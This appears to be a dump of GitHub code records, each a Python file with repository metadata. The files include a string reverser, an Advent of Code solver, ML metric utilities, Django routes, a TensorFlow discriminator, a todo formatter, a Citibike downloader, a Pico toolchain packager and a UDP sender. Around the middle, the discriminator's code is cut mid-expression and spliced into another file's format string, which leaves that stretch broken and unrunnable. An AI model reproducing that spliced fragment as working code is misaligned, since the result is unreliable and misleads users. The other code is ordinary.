''.join(mylist)\n\nx=reverse('I am theja')\nprint(x) \n\n# or just stri[::-1]","repo_name":"theja-m/Data-Structures-and-Algorithms","sub_path":"Data Structures - Arrays/Reversing a string.py","file_name":"Reversing a string.py","file_ext":"py","file_size_in_byte":177,"program_lang":"python","lang":"en","doc_type":"code","stars":1254,"dataset":"github-code","pt":"16"} +{"seq_id":"1085651726","text":"import puzzle\nfrom datetime import datetime\n\n\ndef main(input):\n print('### day 25 ###')\n start1 = datetime.now()\n p1res = part1(input)\n stop1 = datetime.now()\n print(f'p1: {p1res}')\n print(f'p1 took: {stop1 - start1}\\n')\n\n\ndef part1(input: str) -> int:\n card_public_key, door_public_key = get_input(input)\n card_loop_size = find_loop_size(card_public_key, 7)\n print('card loop size', card_loop_size)\n door_loop_size = find_loop_size(door_public_key, 7)\n print('door loop size', door_loop_size)\n\n return transform(door_public_key, card_loop_size)\n\n\ndef find_loop_size(public_key, subject_number):\n secret_loop_size = 0\n v = 1\n while v != public_key:\n secret_loop_size += 1\n v = transform_step(v, subject_number)\n return secret_loop_size\n\n\ndef transform(subject_number, loop_size):\n v = 1\n for i in range(loop_size):\n v = transform_step(v, subject_number)\n return v\n\n\ndef transform_step(value, subject_number) -> int:\n value *= subject_number\n return value % 20201227\n\n\ndef get_input(input: str):\n lines = input.split('\\n')\n public_key_card = int(lines[0])\n public_key_door = int(lines[1])\n return public_key_card, public_key_door\n\n\nif __name__ == \"__main__\":\n main(puzzle.input)\n","repo_name":"rickardenglund/AoC2020","sub_path":"days/25/day.py","file_name":"day.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"9593925448","text":"import torch\nimport numpy as np\nimport pandas as pd\nimport pickle\nfrom Preprocessing import *\nfrom sklearn.metrics import balanced_accuracy_score, roc_auc_score,accuracy_score,precision_recall_fscore_support\nfrom Misc import *\n\n# +\ndef get_dt_ids(df=None):\n if df is None:\n df = load_digital_twin()\n return df.id.values\n\ndef mc_loss(ytrue,ypred,weights=None):\n #this is just the multiclass loss now\n loss = torch.nn.CrossEntropyLoss(weight=weights)\n return loss(ypred,ytrue.argmax(axis=1))\n\n\n# -\n\ndef get_tt_split(ids=None,use_default_split=True,use_bagging_split=False,resample_training=False,df=None):\n if ids is None:\n ids = get_dt_ids(df)\n #pre-made, stratified by decision and outcome 72:28\n if use_default_split:\n train_ids = Const.stratified_train_ids[:]\n test_ids = Const.stratified_test_ids[:]\n elif use_bagging_split:\n train_ids = np.random.choice(ids,len(ids),replace=True)\n test_ids = [i for i in ids if i not in train_ids]\n else:\n test_ids = ids[0: int(len(ids)*(1-split))]\n train_ids = [i for i in ids if i not in test_ids]\n\n if resample_training:\n train_ids = np.random.choice(train_ids,len(train_ids),replace=True)\n test_ids = [i for i in ids if i not in train_ids]\n return train_ids,test_ids\n\ndef transition_sample(state,dataset=None):\n if dataset is None:\n dataset = DTDataset()\n \n ids = get_dt_ids(dataset.processed_df.reset_index())\n \n train_ids, test_ids = get_tt_split(dataset.processed_df.reset_index())\n \n #only train on people with IC for state 1 since other people can't have any outcomes otherwise\n require = None\n if state == 1:\n require = Const.decisions[0] #we don't expect a state update if there is no treatment\n valid_ids = dataset.get_input_state(require=require).index.values\n train_ids = [t for t in train_ids if t in valid_ids]\n test_ids = [t for t in test_ids if t in valid_ids]\n xtrain = dataset.get_input_state(step=state,ids=train_ids,require=require)\n xtest = dataset.get_input_state(step=state,ids=test_ids,require=require)\n ytrain = dataset.get_intermediate_outcomes(step=state,ids=train_ids,require=require)\n ytest = dataset.get_intermediate_outcomes(step=state,ids=test_ids,require=require)\n\n xtrain = df_to_torch(xtrain)\n xtest = df_to_torch(xtest)\n ytrain = [df_to_torch(t) for t in ytrain]\n ytest= [df_to_torch(t) for t in ytest]\n return xtrain,xtest,ytrain,ytest\n\n\n\n\n\n# +\ndef load_models():\n files = [\n '../resources/decision_model.pt',\n '../resources/transition1_model.pt',\n '../resources/transition2_model.pt',\n '../resources/outcome_model.pt',\n '../resources/outcomeDSM.pt',\n ]\n return [torch.load(file) for file in files]\n\n\ndef load_transition_models():\n files = [\n '../resources/transition1_model.pt',\n '../resources/transition2_model.pt',\n '../resources/outcome_model.pt',\n '../resources/outcomeDSM.pt'\n ]\n return [torch.load(file) for file in files]\n\n\n# +\ndef load_sklearn_transition_models():\n model_names = ['transition1_model.pickle','transition2_model.pickle','outcome_model.pickle']\n success = []\n for mname in model_names:\n try:\n name = '../resources/sklearn_models/' + mname\n with open(name,'rb') as f:\n model = pickle.load(f)\n success.append(model)\n except Exception as e:\n success.append(False)\n print(e)\n return success\n\ndef get_weights(df_list,scale = None,to_torch=True):\n getw = lambda df: df.shape[0]/(df.shape[1]*df.sum(axis=0)).values\n w = [getw(df) for df in df_list]\n\n if scale is not None:\n w = [scale(ww) for ww in w]\n if to_torch:\n return [torch.FloatTensor(ww) for ww in w]\n return w\n\n\n# +\ndef mc_metrics(yt,yp,numpy=False,is_dlt=False,is_squeezed=False):\n if not numpy:\n yt = yt.cpu().detach().numpy()\n yp = yp.cpu().detach().numpy()\n #dlt prediction (binary)\n if is_dlt:\n acc = accuracy_score(yt,yp>.5)\n if yt.sum() > 1:\n auc = roc_auc_score(yt,yp)\n else:\n auc=-1\n error = np.mean((yt-yp)**2)\n return {'accuracy': acc, 'mse': error, 'auc': auc}\n #this is a catch for when I se the dlt prediction format (encoded integer ordinal, predict as a categorical and take the argmax)\n elif yt.ndim > 1 or is_squeezed:\n try:\n bacc = balanced_accuracy_score(yt.argmax(axis=1),yp.argmax(axis=1))\n except:\n bacc = -1\n try:\n roc_micro = roc_auc_score(yt,yp,average='micro')\n except:\n roc_micro=-1\n try:\n roc_macro = roc_auc_score(yt,yp,average='macro')\n except Exception as e:\n try: \n roc_macro = roc_auc_score(yt[:,0:2],yp[:,0:2],average='macro')\n except:\n roc_macro = -1\n try:\n roc_weighted = roc_auc_score(yt,yp,average='weighted')\n except:\n try:\n roc_weighted = roc_auc_score(yt[:,0:2],yp[:,0:2],average='weighted')\n except:\n roc_weighted= -1\n return {'accuracy': bacc, 'auc_micro': roc_micro,'auc_mean': roc_macro,'auc_weighted': roc_weighted}\n #outcomes (binary)\n else:\n multiclass = yp.ndim > 1\n if multiclass:\n yp = yp.argmax(axis=1)\n try:\n if not multiclass:\n bacc = accuracy_score(yt,(yp>.5).astype(int))\n else:\n bacc = accuracy_score(yt,yp)\n except Exception as e:\n print(e,yp,yt)\n bacc = -1\n try:\n roc = roc_auc_score(yt,yp)\n except:\n roc = -1\n try:\n if not multiclass:\n pr,re,fscore,supp = precision_recall_fscore_support(yt,(yp>.5).astype(int),average='binary')\n else:\n pr,re,fscore,supp = precision_recall_fscore_support(yt,yp,average='macro')\n except Exception as e:\n print(e)\n [pr,re,fscore,supp] = [-1,-1,-1,-1]\n error = np.mean((yt-yp)**2)\n return {'accuracy': bacc, 'mse': error, 'auc': roc,'precision': pr,'recall':re,'f1':fscore}\n\ndef state_metrics(ytrue,ypred,numpy=False):\n pd_metrics = mc_metrics(ytrue[0],ypred[0],numpy=numpy)\n nd_metrics = mc_metrics(ytrue[1],ypred[1],numpy=numpy)\n mod_metrics = mc_metrics(ytrue[1],ypred[1],numpy=numpy)\n \n dlt_metrics = []\n dlt_true = ytrue[3]\n dlt_pred = ypred[3]\n ndlt = dlt_true.shape[1]\n nloss = torch.nn.NLLLoss()\n for i in range(ndlt):\n dm = mc_metrics(dlt_true[:,i],dlt_pred[:,i].view(-1),is_dlt=True)\n dlt_metrics.append(dm)\n dlt_acc =[d['accuracy'] for d in dlt_metrics]\n dlt_error = [d['mse'] for d in dlt_metrics]\n dlt_auc = [d['auc'] for d in dlt_metrics]\n \n acc_mean = np.mean([a for a in dlt_acc if a >= 0 and a < 1])\n auc_mean = np.mean([a for a in dlt_auc if a >= 0])\n results = {'pd': pd_metrics,'nd': nd_metrics,'mod': mod_metrics,\n 'dlts': {'accuracy': dlt_acc,'accuracy_mean': acc_mean,'auc': dlt_auc,'auc_mean': auc_mean}\n }\n return results\ndef outcome_metrics(ytrue,ypred,numpy=False):\n res = {}\n for i, outcome in enumerate(Const.outcomes):\n metrics = mc_metrics(ytrue[i],ypred[:,i])\n res[outcome] = metrics\n return res\n\ndef baseline_mc_metrics(yt,yp):\n #this is a catch for when I se the dlt prediction format (encoded integer ordinal, predict as a categorical and take the argmax)\n try:\n bacc = balanced_accuracy_score(yt,np.argmax(yp,axis=1))\n except Exception as e:\n print('bacc',e)\n bacc = -1\n try:\n roc_micro = roc_auc_score(yt,yp,average='macro',multi_class='ovr')\n except Exception as e:\n print('micro',e)\n roc_micro = -1\n try:\n roc_macro = roc_auc_score(yt,yp,average='macro',multi_class='ovr')\n except Exception as e:\n print('macro',e)\n roc_macro = -1\n try:\n roc_weighted = roc_auc_score(yt,yp,average='weighted',multi_class='ovr')\n except Exception as e:\n print('weighted',e)\n roc_weighted= -1\n return {'accuracy': bacc,'auc_micro':roc_micro,'auc_mean':roc_macro,'auc_weighted':roc_weighted}\n \ndef boolean_metrics(yt,yp,yp_bool=None):\n if yp_bool is None:\n yp_bool = yp > .5\n precision, recall, f1, support = precision_recall_fscore_support(yt,yp_bool,pos_label=1,average='binary')\n auc = roc_auc_score(yt,yp)\n return {'auc': auc, 'f1': f1, 'precision': precision, 'recall':recall}\n\n","repo_name":"tehwentzel/DigitalTwinVis","sub_path":"Backend/Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":8751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"18039355394","text":"from django.urls import path\nfrom rest_framework.routers import DefaultRouter\n\nfrom .views import BookViewSet, JournalViewSet, BookListCreateAPIView, JournalListCreateAPIView\n\n\nurlpatterns = [\n path('books/', BookListCreateAPIView.as_view()),\n path('journals/', JournalListCreateAPIView.as_view()),\n]\n\nrouter = DefaultRouter()\n\nrouter.register('books', BookViewSet, basename='books')\nrouter.register('journals', JournalViewSet, basename='journal')\nurlpatterns += router.urls\n","repo_name":"Alibek120699/BFDjango","sub_path":"midterm/book_store/core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"41630235562","text":"import tensorflow as tf\r\nimport numpy as np\r\n\r\ndef cosine_similarity(a,b):\r\n normalize_a = tf.nn.l2_normalize(a, -1)\r\n normalize_b = tf.nn.l2_normalize(b, -1)\r\n cos_similarity = (tf.multiply(normalize_a, normalize_b))\r\n return cos_similarity\r\n\r\n# The highway layer is borrowed from https://github.com/mkroutikov/tf-lstm-char-cnn\r\ndef linear(input_, output_size, scope=None):\r\n shape = input_.get_shape().as_list()\r\n if len(shape) != 2:\r\n raise ValueError(\"Linear is expecting 2D arguments: %s\" % str(shape))\r\n if not shape[1]:\r\n raise ValueError(\"Linear expects shape[1] of arguments: %s\" % str(shape))\r\n input_size = shape[1]\r\n with tf.variable_scope(scope or \"SimpleLinear\"):\r\n matrix = tf.get_variable(\"Matrix\", [output_size, input_size], dtype=input_.dtype)\r\n bias_term = tf.get_variable(\"Bias\", [output_size], dtype=input_.dtype)\r\n\r\n return tf.matmul(input_, tf.transpose(matrix)) + bias_term\r\n\r\n\r\ndef highway(input_, size, num_layers=1, bias=-2.0, f=tf.nn.relu, scope='Highway'):\r\n \"\"\"Highway Network (cf. http://arxiv.org/abs/1505.00387).\r\n t = sigmoid(Wy + b)\r\n z = t * g(Wy + b) + (1 - t) * y\r\n where g is nonlinearity, t is transform gate, and (1 - t) is carry gate.\r\n \"\"\"\r\n with tf.variable_scope(scope):\r\n for idx in range(num_layers):\r\n g = f(linear(input_, size, scope='highway_lin_%d' % idx))\r\n\r\n t = tf.sigmoid(linear(input_, size, scope='highway_gate_%d' % idx) + bias)\r\n\r\n output = t * g + (1. - t) * input_\r\n input_ = output\r\n return output\r\n\r\nclass Discriminator(object):\r\n def __init__(self, sequence_length, num_classes, vocab_size,dis_emb_dim,filter_sizes, num_filters,batch_size,hidden_dim,\r\n start_token,goal_out_size,step_size,LikeWord, StrucWord,word_tag_index,tag_prob_list,l2_reg_lambda=0.0, dropout_keep_prob=0.75 ):\r\n self.sequence_length = sequence_length\r\n self.num_classes = num_classes\r\n self.vocab_size = vocab_size\r\n self.dis_emb_dim = dis_emb_dim\r\n self.filter_sizes = filter_sizes\r\n self.num_filters = num_filters\r\n self.batch_size = batch_size\r\n self.hidden_dim = hidden_dim\r\n self.start_token = tf.constant([start_token] * self.batch_size, dtype=tf.int32)\r\n self.l2_reg_lambda = l2_reg_lambda\r\n self.num_filters_total = sum(self.num_filters)\r\n self.temperature = 1.0\r\n self.grad_clip = 5.0\r\n self.goal_out_size = goal_out_size\r\n self.step_size = step_size\r\n self.dropout_keep_prob = dropout_keep_prob\r\n self.LikeWord = LikeWord\r\n self.StrucWord = StrucWord\r\n self.D_input_y = tf.placeholder(tf.float32, [None, num_classes], name=\"input_y\")\r\n self.D_input_x = tf.placeholder(tf.int32, [None, sequence_length], name=\"input_x\")\r\n self.word_tag_index = word_tag_index\r\n self.tag_prob_list = tag_prob_list\r\n self.tag_len = 39\r\n self.max_word = max([int(x) for x in word_tag_index.keys()])\r\n self.WordTagIndexArray = tf.TensorArray(dtype=tf.int32, size=0,\r\n dynamic_size=True, infer_shape=True, clear_after_read=False)\r\n self.TagProbArray = tf.TensorArray(dtype=tf.float32, size=0,\r\n dynamic_size=True, infer_shape=True, clear_after_read=False) \r\n \r\n for i in range(len(tag_prob_list)):\r\n self.TagProbArray = self.TagProbArray.write(i,self.tag_prob_list[i])\r\n for word in self.word_tag_index.keys():\r\n self.WordTagIndexArray = self.WordTagIndexArray.write(int(word),self.word_tag_index[word])\r\n \r\n with tf.name_scope('D_update'):\r\n self.D_l2_loss = tf.constant(0.0)\r\n self.FeatureExtractor_unit = self.FeatureExtractor()\r\n\r\n # Train for Discriminator\r\n with tf.variable_scope(\"feature\") as self.feature_scope:\r\n D_feature = self.FeatureExtractor_unit(self.D_input_x,self.dropout_keep_prob)#,self.dropout_keep_prob)\r\n self.feature_scope.reuse_variables()\r\n\r\n D_scores, D_predictions,self.ypred_for_auc = self.classification(D_feature)\r\n losses = tf.nn.softmax_cross_entropy_with_logits(logits=D_scores, labels=self.D_input_y)\r\n self.D_loss = tf.reduce_mean(losses) + self.l2_reg_lambda * self.D_l2_loss\r\n\r\n self.D_params = [param for param in tf.trainable_variables() if\r\n 'Discriminator' or 'FeatureExtractor' in param.name]\r\n d_optimizer = tf.train.AdamOptimizer(5e-5)\r\n D_grads_and_vars = d_optimizer.compute_gradients(self.D_loss, self.D_params, aggregation_method=2)\r\n self.D_train_op = d_optimizer.apply_gradients(D_grads_and_vars)\r\n \r\n # This module used to Extract sentence's Feature\r\n def FeatureExtractor(self):\r\n def unit(Feature_input,dropout_keep_prob):#,dropout_keep_prob):\r\n with tf.variable_scope('FeatureExtractor') as scope:\r\n with tf.device('/cpu:0'), tf.name_scope(\"embedding\") as scope:\r\n W_fe = tf.get_variable(\r\n name=\"W_fe\",\r\n initializer=tf.random_uniform([self.vocab_size + 1, self.dis_emb_dim], -1.0, 1.0)) #word embedding random initial\r\n self.LikeWord = [int(x) for x in self.LikeWord]\r\n self.LikeWordEmb = tf.nn.embedding_lookup(W_fe,self.LikeWord)\r\n self.StrucWord = [int(x) for x in self.StrucWord]\r\n self.StrucWordEmb = tf.nn.embedding_lookup(W_fe,self.StrucWord)\r\n self.TempSeqLen = self.sequence_length\r\n self.TempSeqLen_ = self.sequence_length\r\n self.MaxWord = self.max_word\r\n self.TagLen = self.tag_len\r\n self.DisEmbDim = self.dis_emb_dim\r\n def high_fn(feature):\r\n temp,word_vec,flag = tf.map_fn(low_fn,feature,dtype=(tf.float32,tf.float32,tf.int32))\r\n def cond_bi(i,Temp,feature,temp,OldTag,OldProb,NewTag,NewProb,const,t):\r\n return i3.3} {c1}{content}{c0}\\n {c3}{project_name:22.22}{c4} {label_names:22.22} {c2}Due: {due:12.12}{c0} [{taskid}]\\n',\n 'project': '\\n{color}#{project_name}\\n',\n 'unknown': '',\n }\n \n @staticmethod\n def task(obj):\n indent = ' ' * (int(obj.get('indent', '1')) - 1)\n priority = ' '\n if obj.priority and obj.priority != 1:\n priority = '!' * (obj.priority - 1)\n due = obj.get_date()\n if due:\n due += ' '\n print(Plain.FORMAT['task'].format(c0=colors.ENDC,\n c1=colors.CONTENT,\n c2=colors.DATE,\n c3=colors.PROJECT,\n c4=colors.LABEL,\n c5=colors.PRIORITY,\n\t\t\t\t\t indent=indent,\n priority=priority,\n content=obj.get('content'),\n project_name=obj.get('project_name'),\n label_names=obj.get('label_names'),\n due=due,\n taskid=obj.get('id')), end='')\n\n @staticmethod\n def task_set(obj):\n color = Plain.COLORS[obj.set_type]\n print(Plain.FORMAT[obj.set_type].format(color=color,\n **obj.raw), end='')\n for task in obj:\n Plain.task(task)\n\n @staticmethod\n def result_set(obj):\n if obj.name:\n print('{}{}\\n{}{}'.format(colors.FILTER, obj.name,\n ''.join('=' for _ in obj.name or ''),\n colors.ENDC))\n for task_set in obj.task_sets:\n Plain.task_set(task_set)\n if obj.tasks:\n Plain.task_set(obj.tasks)\n\nclass Org:\n PRIORITY = { 1: '', 2: 'C', 3: 'B', 4: 'A' }\n DATE = 'DEADLINE: <{} {}>'\n NAMES = {\n 'project': '{project_name}',\n 'unknown': '',\n }\n \n @staticmethod\n def task(obj, level=2):\n stars = ('*' * (level - 1)) + ('*' * (int(obj.get('indent', '1'))))\n indent = ' ' * (len(stars) + 1)\n priority = Org.PRIORITY[obj.priority or 1]\n due = obj.due_date and Org.DATE.format(obj.due_date.date().isoformat(),\n obj.due_date.strftime(\"%A\")[:3])\n props = {\n 'TaskID': obj.get('id'),\n 'Recurring': obj.is_recurring and 'yes' or 'no',\n }\n if obj.labels:\n props['Labels'] = ', '.join(map(str, obj.labels))\n if obj.project:\n props['Project'] = obj.project\n if obj.date_string:\n props['DateString'] = obj.date_string\n\n print('{} {} {}{}'.format(stars,\n 'DONE' if obj.checked else 'TODO',\n '[#{}] '.format(priority) if priority else '',\n obj.content))\n if due:\n print(indent + due)\n print(indent + ':PROPERTIES:')\n prop_len = max(len(val) for val in props.keys()) + 3\n for prop, value in props.items():\n prop_value = ('{:<' + str(prop_len) + '}{}').format(':{}:'.format(prop),\n value)\n print(indent + prop_value)\n print(indent + ':END:')\n\n @staticmethod\n def task_set(obj, level=1):\n name = Org.NAMES[obj.set_type].format(**obj.raw)\n if name:\n print('{} {}'.format('*' * level, name))\n for task in obj:\n Org.task(task, level=(level+1) if name else level)\n\n @staticmethod\n def result_set(obj):\n level = 1\n if obj.name:\n level = 2\n print('* ' + obj.name)\n for task_set in obj.task_sets:\n Org.task_set(task_set, level=level)\n for task in obj.tasks:\n Org.task(task, level=level)\n\nclass Alfred:\n @staticmethod\n def task(items, obj):\n item = ET.SubElement(items, 'item')\n item.set('uid', str(obj.get('id')))\n item.set('arg', str(obj.get('id')))\n\n title = ET.SubElement(item, 'title')\n title.text = obj.content\n\n @staticmethod\n def task_set(items, obj):\n for task in obj:\n Alfred.task(items, task)\n\n @staticmethod\n def result_set(obj):\n items = ET.Element('items')\n for task_set in obj.task_sets:\n Alfred.task_set(items, task_set)\n for task in obj.tasks:\n Alfred.task(items, task)\n ET.dump(items)\n\nformaters = {\n 'plain': Plain,\n 'org': Org,\n 'alfred': Alfred\n}\n","repo_name":"ddksr/cliist","sub_path":"lib/output.py","file_name":"output.py","file_ext":"py","file_size_in_byte":5049,"program_lang":"python","lang":"en","doc_type":"code","stars":111,"dataset":"github-code","pt":"16"} +{"seq_id":"16305965125","text":"import argparse\nimport os\nimport re\nimport zipfile\nfrom urllib.request import urlretrieve\n\nfrom bs4 import BeautifulSoup\nfrom tqdm import tqdm\n\n\nclass TqdmUpTo(tqdm):\n def update_to(self, b=1, bsize=1, tsize=None):\n if tsize is not None:\n self.total = tsize\n self.update(b * bsize - self.n)\n\n\ndef download_zip(url, output_dir, simulate):\n file_name = url.split('/')[-1]\n output_file = os.path.join(output_dir, file_name)\n\n if simulate:\n print(f'Simulating download: {url} -> {output_file}')\n return output_file\n\n with TqdmUpTo(unit='B', unit_scale=True, miniters=1, desc=file_name) as t:\n urlretrieve(url, filename=output_file, reporthook=t.update_to)\n\n return output_file\n\n\ndef unzip_file(file_path, output_dir, simulate):\n if simulate:\n print(f'Simulating unzip: {file_path}')\n return\n\n with zipfile.ZipFile(file_path, 'r') as zip_ref:\n zip_ref.extractall(output_dir)\n\n\ndef main(input_html_file, output_dir, simulate, unzip):\n with open(input_html_file, 'r') as f:\n html_content = f.read()\n\n soup = BeautifulSoup(html_content, 'html.parser')\n links = soup.find_all('a', href=True)\n\n csv_zip_links = [link['href'] for link in links if link['href'].endswith('.zip') and not link['href'].startswith('https://s3.amazonaws.com/tripdata/JC-')]\n print(f'Found {len(csv_zip_links)} zip files to download.')\n\n os.makedirs(output_dir, exist_ok=True)\n\n for url in csv_zip_links:\n downloaded_file = download_zip(url, output_dir, simulate)\n if unzip:\n unzip_file(downloaded_file, output_dir, simulate)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Download and unzip Citibike trip data.')\n parser.add_argument('input_html_file', help='Input HTML file with links to the zip files.')\n parser.add_argument('output_dir', help='Directory to store the downloaded and unzipped files.')\n parser.add_argument('--simulate', action='store_true', help='Simulate the download and unzip process without actually downloading and unzipping the files.')\n parser.add_argument('--unzip', action='store_true', help='Unzip the downloaded files.')\n\n args = parser.parse_args()\n\n main(args.input_html_file, args.output_dir, args.simulate, args.unzip)\n","repo_name":"KranthiGV/transport-efficiency-analysis","sub_path":"scripts/citibike/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"74655691528","text":"from api.example import get_nobel_prizes\nimport asyncio\n\n\ndef main():\n \"\"\"Entry point for the application\"\"\"\n response = asyncio.run(get_nobel_prizes())\n nobel_prize_count = response[\"meta\"][\"count\"]\n print(\n f\"There are a total of {nobel_prize_count} nobel prizes award from 1901 to date, according to nobelprize.org\"\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"biggestcookie/python-template","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"29224176241","text":"import torch\nimport numpy as np\nimport torch.nn.functional as F\n\nfrom config import Config\nconfig = Config()\n\n\ndef gpu_wrapper(item):\n if config.gpu:\n # print(item)\n return item.cuda()\n else:\n return item\n\n\ndef strip_eos(sents):\n return [sent[:sent.index('')] if '' in sent else sent\n for sent in sents]\n\n\ndef strip_pad(sents):\n return [sent[:sent.index('')] if '' in sent else sent\n for sent in sents]\n\n\ndef gumbel_softmax(logits, gamma, eps=1e-20):\n \"\"\" logits.shape = (..., voc_size) \"\"\"\n U = torch.zeros_like(logits).uniform_()\n G = -torch.log(-torch.log(U + eps) + eps)\n return F.softmax((logits + G) / gamma, dim=-1)\n\n\ndef pretty_string(flt):\n ret = '%.4f' % flt\n if flt > 0:\n ret = \"+\" + ret\n return ret\n\n\ndef sample_2d(probs, temperature):\n \"\"\"probs.shape = (n_batch, n_choices)\"\"\"\n if temperature != 1:\n temp = torch.exp(torch.div(torch.log(probs + 1e-20), config.temp_att)) # shape = (n_batch, 20)\n else:\n temp = probs\n sample_idx = torch.multinomial(temp, 1) # shape = (n_batch, 1)\n sample_probs = probs.gather(1, sample_idx) # shape = (n_batch, 1)\n sample_idx = sample_idx.squeeze(1) # shape = (n_batch, )\n sample_probs = sample_probs.squeeze(1) # shape = (n_batch, )\n return sample_idx, sample_probs","repo_name":"ChenWu98/Point-Then-Operate","sub_path":"PTO-amazon/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"16"} +{"seq_id":"38053770458","text":"import sys\nimport urllib.request\nimport subprocess\nimport os\nimport shutil\n\nversion = sys.argv[1]\npico_url = fr\"https://github.com/raspberrypi/pico-setup-windows/releases/download/{version}/pico-setup-windows-x64-standalone.exe \"\n\n\ndef copy_file_or_folder(source, destination):\n try:\n if os.path.isfile(source):\n shutil.copy2(source, destination)\n print(f\"copy '{source}' to '{destination}'\")\n elif os.path.isdir(source):\n shutil.copytree(source, destination)\n print(f\"copy '{source}' to '{destination}'\")\n else:\n print(\"Unknown file\")\n except Exception as e:\n print(f\"error: {e}\")\n\n\ndef copy(source_folder, target_folder, file_name):\n source_path = os.path.join(source_folder, file_name)\n target_path = os.path.join(target_folder, file_name)\n\n try:\n copy_file_or_folder(source_path, target_path)\n except FileNotFoundError:\n print(f\"file not found '{file_name}' in '{source_folder}'\")\n except Exception as e:\n print(f\"error: {e}\")\n\n\ndef download_and_extract(url, extract_path):\n # 从URL中提取文件名\n file_name = os.path.basename(url)\n\n # 下载ZIP文件\n urllib.request.urlretrieve(url, file_name)\n\n # 解压ZIP文件\n subprocess.run(rf'7z x {file_name} -o{extract_path}', check=True)\n\n\n# 只需要这些就能编译,别的没用\nfile_list = [\n \"gcc-arm-none-eabi\",\n \"openocd\",\n \"pico-sdk-tools\",\n \"python\",\n \"git\",\n \"pico-examples.zip\",\n \"cmake\",\n \"ninja\",\n \"pico-env.cmd\",\n \"pico-sdk\",\n \"picotool\"\n]\n\nbuild_dir = \"temp\"\ntoolchain_dir = f\"pico-toolchain-{version}\"\n\ndownload_and_extract(pico_url, build_dir)\nos.mkdir(toolchain_dir)\nfor file in file_list:\n copy(build_dir, toolchain_dir, file)\n\n# 在每次打开bat时候,自动生成这个ini\nfix_bat = fr'''@echo off\nsetlocal\n\nset PICO_SDK_VERSION={version[1:]}\nset PICO_INSTALL_PATH=%~dp0\nset PICO_REG_KEY=Software\\Raspberry Pi\\Pico SDK v%PICO_SDK_VERSION%\n\nif \"%PICO_INSTALL_PATH:~-1%\"==\"\\\" (\n set \"PICO_INSTALL_PATH=%PICO_INSTALL_PATH:~0,-1%\"\n)\n\n:: generate version.ini\necho [pico-setup-windows]> %~dp0version.ini\necho PICO_SDK_VERSION=%PICO_SDK_VERSION%>> %~dp0version.ini\necho PICO_INSTALL_PATH=%PICO_INSTALL_PATH%>> %~dp0version.ini\necho PICO_REG_KEY=%PICO_REG_KEY%>> %~dp0version.ini\n\necho version.ini generated\nendlocal\n\n'''\n\nwith open(toolchain_dir + \"/pico-env.cmd\", \"r\") as f:\n original_content = f.read()\nwith open(toolchain_dir + \"/pico-env.cmd\", \"w\") as f:\n f.write(fix_bat + original_content)\n","repo_name":"liux-pro/raspberry-pi-pico-toolchain-for-windows","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"24266118785","text":"#!/usr/bin/env python\n\n# CS456 Assignment #2\n# Aaron Lau\n# 20572242\n\nfrom socket import *\nfrom struct import *\nimport sys, string, time, math, threading, signal\n\nsendBaseSeqNum = 0\neotReceived = False\nsendBuffer = []\ntimeouts = []\nwindowSize = 10\nlock = threading.Lock()\nfirstInWindow = 0\nlastInWindow = firstInWindow + windowSize -1\neotAckReceived = False\n\n## Keep track of the timeout values which are sent to the server\ndef timeoutHandler(signum, frame):\n global protocol\n global timeouts\n global windowSize\n global sendBuffer\n global lock\n global senderSocket\n global channelIP\n global channelPort\n global sendBaseSeqNum\n global firstInWindow\n global lastInWindow\n global timeout\n\n # Protocol = Go back N\n if protocol == 0:\n for index, timeoutValue in enumerate(timeouts):\n timeouts[index] = timeoutValue - 1\n if len(timeouts) > 0 and timeouts[0] <= 0:\n lock.acquire()\n while True:\n try:\n print (\"PKT SEND DAT {} {}\".format(sendBuffer[0][0]+12, sendBuffer[0][1]))\n resendPacket = sendBuffer[0][2]\n senderSocket.sendto(resendPacket,(channelIP.decode(\"utf-8\") , int(channelPort.decode(\"utf-8\")) ))\n timeouts[0] = timeout\n break\n except:\n pass\n lock.release()\n elif protocol == 1:\n for i in range(windowSize):\n counter = firstInWindow + i\n counter %= 256\n timeouts[counter % windowSize] = timeouts[counter % windowSize] - 1\n lock.acquire()\n if timeouts[counter % windowSize] <= 0 and sendBuffer[counter % windowSize] != None:\n while True:\n if sendBuffer[counter % windowSize] != None:\n # this try/catch is necessary for when the I/O buffer is\n try:\n print (\"PKT reSEND DAT {} {}\".format(sendBuffer[counter % windowSize][0]+12, sendBuffer[counter % windowSize][1]))\n resendPacket = sendBuffer[counter % windowSize][2]\n senderSocket.sendto(resendPacket,(channelIP.decode(\"utf-8\") , int(channelPort.decode(\"utf-8\")) ))\n timeouts[counter % windowSize] = timeout\n break\n except:\n pass\n else:\n break\n lock.release()\n\n\n# function that will run in another thread to wait for ACKS\ndef getACKs(senderSocket, throwaway):\n global protocol\n global timeouts\n global windowSize\n global sendBuffer\n global lock\n global sendBaseSeqNum\n global firstInWindow\n global lastInWindow\n global eotAckReceived\n\n while True:\n ackPacket, addr = senderSocket.recvfrom(4096)\n packet = unpack('!III', ackPacket)\n packetType = packet[0]\n packetLength = packet[1]\n ackNum = packet[2]\n print (\"PKT RECV ACK {} {}\".format(packetLength, ackNum))\n # Protocol = Go back N\n if protocol == 0:\n if packetType == 1:\n if ackNum == sendBaseSeqNum:\n lock.acquire()\n sendBuffer.pop(0)\n timeouts.pop(0)\n sendBaseSeqNum+=1\n sendBaseSeqNum%=256\n lock.release()\n elif packetType == 2:\n print (\"PKT RECV 